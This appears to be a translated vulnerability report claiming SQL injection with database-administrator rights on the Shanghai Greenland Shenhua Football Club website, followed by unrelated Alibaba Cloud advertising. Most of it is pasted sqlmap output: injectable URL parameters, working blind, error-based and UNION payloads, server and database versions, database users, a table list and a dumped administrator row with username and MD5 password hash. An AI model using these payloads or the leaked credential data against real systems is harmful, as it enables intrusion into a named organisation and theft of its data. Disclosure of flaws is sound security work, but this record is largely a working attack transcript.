Shanghai Greenland Shenhua Football Club official website has SQL injection (DBA permission)
Rt.
Shanghai Greenland Shenhua Football Club official website:
Http ://**.**.**.**
The vulnerability exists in:
Http: // **. **/news. php? Category = 41
Http: // **. **/news_detail.php? Newsid= 5232
Http: // **. **/news_detail.php? Newsid= 5231
Http: // **. **/news_detail.php? Newsid= 5229
Http: // **. **/news_detail.php? Newsid= 5227
...
...
Take the first one for testing, injection type and Configuration:
sqlmap resumed the following injection point(s) from stored session:---Parameter: category (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: category=41 AND 7007=7007 Vector: AND [INFERENCE] Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: category=41 AND (SELECT 6357 FROM(SELECT COUNT(*),CONCAT(0x7170627071,(SELECT (ELT(6357=6357,1))),0x716a787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: category=-7274 UNION ALL SELECT NULL,CONCAT(0x7170627071,0x624c4f57546b436a44727a564167626e70504977547a67627552656749564f744367667953665943,0x716a787171)-- Vector: UNION ALL SELECT NULL,[QUERY]-----[12:17:14] [INFO] the back-end DBMS is MySQLweb server operating system: Linux Red Hat Enterprise 5 (Tikanga)web application technology: Apache 2.2.3, PHP 5.1.6back-end DBMS: MySQL 5.0Database:
Available databases [5]:
[*] information_schema[*] mysql[*] phplampDB[*] shenhuafc[*] testUser:
Database management system users [7]:
[*] ''@'H00CNSHJVFCW01'[*] ''@'localhost'[*] 'phplamp'@'localhost'[*] 'root'@'%'[*] 'root'@'**.**.**.**'[*] 'root'@'H00CNSHJVFCW01'[*] 'root'@'localhost'Whether it is DBA:
Current user is DBA: True
All tables in the shen1_fc database:
Database: shen1_fc
[33 tables]+--------------------+| sh_coach_info || sh_coach_list || sh_coach_type || sh_coutry || sh_document || sh_document_file || sh_ematches || sh_goal_list || sh_img_category || sh_imgfiles || sh_imgs || sh_league || sh_league_result || sh_match_his || sh_matches || sh_matches_type || sh_members || sh_members_list || sh_news || sh_newscategory || sh_newsfile || sh_play_list || sh_position || sh_round || sh_seasons || sh_slider || sh_slider_config || sh_team_sort || sh_teams || sh_video_files || sh_videocategory || sh_videos || web_administrators |+--------------------+Web_administrators table:
Database: shen1_fc
Table: web_administrators[1 entry]+------------+---------+------------+----------------------------------+---------+-----+----------+| initialize | loginip | logintime | password | regtime | uid | username |+------------+---------+------------+----------------------------------+---------+-----+----------+| 1 | unknown | 1448935165 | 567ba5580207d687b73412b96d5e86da | 0 | 1 | admin |+------------+---------+------------+----------------------------------+---------+-----+----------+Point to end, no more in-depth.
Certified.
Solution:
No.
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
